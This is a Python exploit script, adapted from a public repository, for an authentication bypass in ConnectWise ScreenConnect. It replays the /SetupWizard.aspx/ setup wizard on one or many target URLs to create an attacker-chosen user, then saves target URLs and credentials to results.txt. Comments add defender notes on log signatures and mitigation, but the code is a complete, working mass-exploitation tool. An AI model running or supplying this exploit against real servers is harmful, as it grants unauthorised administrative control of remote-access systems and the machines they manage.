# Based on: https://raw.githubusercontent.com/jhonnybonny/auth_bypass_connectwise_screenconnect/main/bypass.py
import requests
import re
import argparse
from colorama import Fore, Style
# Command-line interface: the account name and password to submit, plus either
# a single target (--url) or a file listing one target per line (--urls).
parser = argparse.ArgumentParser(
    formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument(
    "--username",
    required=True,
    action="store",
    help="username to add",
)
parser.add_argument(
    "--password",
    required=True,
    action="store",
    help="password to add (must be at least 8 characters in length)",
)
parser.add_argument("--urls", help="path to the file containing URLs")
parser.add_argument("--url", help="run only on this URL")
args = parser.parse_args()

# argparse cannot express "one of the two is required" with plain optional
# arguments, so the check is done by hand; parser.error() prints usage and exits.
if args.url is None and args.urls is None:
    parser.error('Either --url or --urls must be provided.')

# Silences urllib3 warnings. The requests made later in this script pass
# verify=False, so this hides the unverified-HTTPS warning they would trigger.
requests.urllib3.disable_warnings()

# Build the target list: --url wins when it is non-empty, otherwise every line
# of the --urls file is taken as-is after stripping surrounding whitespace.
if args.url:
    urls = [args.url]
else:
    urls = []
    try:
        with open(args.urls, 'r') as url_file:
            urls.extend(entry.strip() for entry in url_file)
    except FileNotFoundError:
        print("Error: File '{}' not found.".format(args.urls))
        exit(1)
    except Exception as read_error:
        print("Error occurred while reading file:", read_error)
        exit(1)
# Iterate over each URL and perform actions.
#
# For each target this loop drives the server's first-run setup wizard
# (/SetupWizard.aspx/, always requested with the trailing slash shown below)
# through three requests: a GET that loads the page, a POST that presses "Next"
# on the start step, and a POST that submits a username, e-mail and password on
# the account step.
#
# Defender notes, drawn only from what the requests below contain:
#   - Web-server logs: one GET followed by two POSTs to /SetupWizard.aspx/ from
#     the same client. Such requests are unexpected on a server that has
#     already completed setup and are worth alerting on.
#   - Account review: a user whose e-mail address is "<username>@poc.com"; the
#     domain is hard-coded in the form data below.
#   - Host forensics: a results.txt holding "<url>" then "<user>:<password>"
#     blocks is what this script leaves behind on the machine that ran it.
#   - Mitigation is server-side: run a vendor release in which the setup wizard
#     is not reachable once setup is complete (see the vendor advisory for the
#     authentication bypass named in the upstream repository URL at the top of
#     this file), and restrict who can reach the web interface.
for url_from_file in urls:
    # Echo the target and the credentials that will be submitted; the password
    # is printed to the terminal in clear text.
    print(f"{Fore.LIGHTMAGENTA_EX} Target:{Style.RESET_ALL} {url_from_file} ")
    print(f"{Fore.LIGHTMAGENTA_EX} Username:{Style.RESET_ALL} {args.username} ")
    print(f"{Fore.LIGHTMAGENTA_EX} Password:{Style.RESET_ALL} {args.password} ")
    try:
        # Send initial request: load the wizard page. TLS certificate
        # verification is disabled (verify=False) and the timeout is 5 seconds.
        initial_request = requests.get(url=url_from_file + "/SetupWizard.aspx/", verify=False, timeout=5)
        initial_request.raise_for_status() # Raises an HTTPError for bad status codes
        # Extract required data from the response: the hidden form fields that
        # are echoed back in the next POST. The first pattern takes the first
        # value="..." attribute found in the page — presumably the __VIEWSTATE
        # field, although the pattern itself does not name it. When a pattern
        # does not match, re.search returns None and .group(1) raises
        # AttributeError, which the last handler of this try block reports.
        viewstate_1 = re.search(r'value="([^"]+)"', initial_request.text).group(1)
        viewgen_1 = re.search(r'VIEWSTATEGENERATOR" value="([^"]+)"', initial_request.text).group(1)
        # Prepare data for the next request: the postback fields plus the start
        # step's "Next" button.
        next_data = {
            "__EVENTTARGET": '',
            "__EVENTARGUMENT": '',
            "__VIEWSTATE": viewstate_1,
            "__VIEWSTATEGENERATOR": viewgen_1,
            "ctl00$Main$wizard$StartNavigationTemplateContainerID$StartNextButton": "Next"
        }
        # Send the next request (advances the wizard to the account step).
        next_request = requests.post(url=url_from_file + "/SetupWizard.aspx/", data=next_data, verify=False)
        # Extract required data from the response: the same two hidden fields,
        # re-read from the page returned by the previous POST.
        exploit_viewstate = re.search(r'value="([^"]+)"', next_request.text).group(1)
        exploit_viewgen = re.search(r'VIEWSTATEGENERATOR" value="([^"]+)"', next_request.text).group(1)
        # Prepare data for the exploit request: the account form. The e-mail is
        # always "<username>@poc.com" and the password is sent in both the
        # password and verify-password boxes.
        exploit_data = {
            "__LASTFOCUS": '',
            "__EVENTTARGET": '',
            "__EVENTARGUMENT": '',
            "__VIEWSTATE": exploit_viewstate,
            "__VIEWSTATEGENERATOR": exploit_viewgen,
            "ctl00$Main$wizard$userNameBox": args.username,
            "ctl00$Main$wizard$emailBox": args.username + "@poc.com",
            "ctl00$Main$wizard$passwordBox": args.password,
            "ctl00$Main$wizard$verifyPasswordBox": args.password,
            "ctl00$Main$wizard$StepNavigationTemplateContainerID$StepNextButton": "Next"
        }
        # Send the exploit request. The response object is never inspected, so
        # the message and the results.txt entry below are produced whenever the
        # POST completes without a transport error, whether or not the server
        # accepted the form.
        exploit_request = requests.post(url=url_from_file + "/SetupWizard.aspx/", data=exploit_data, verify=False)
        print(f"\n{Fore.CYAN} Successfully added user {Style.RESET_ALL}\n\n")
        # Append the target and the credentials, in clear text, to results.txt
        # in the current working directory.
        with open('results.txt', 'a') as f:
            f.write(f'{url_from_file}\n{args.username}:{args.password}\n\n\n')
    except requests.exceptions.RequestException as e:
        # Connection failures, timeouts, and the HTTPError raised by
        # raise_for_status() on the initial GET all land here.
        print(f"\nUnable to connect to the target server: {e}\n")
    except (AttributeError, IndexError, KeyError, ValueError) as e:
        # Reached when a response does not contain the expected hidden fields
        # (the failed .group(1) call above); the loop then moves on to the next
        # target.
        print(f"\nError processing response from the server: {e}\n")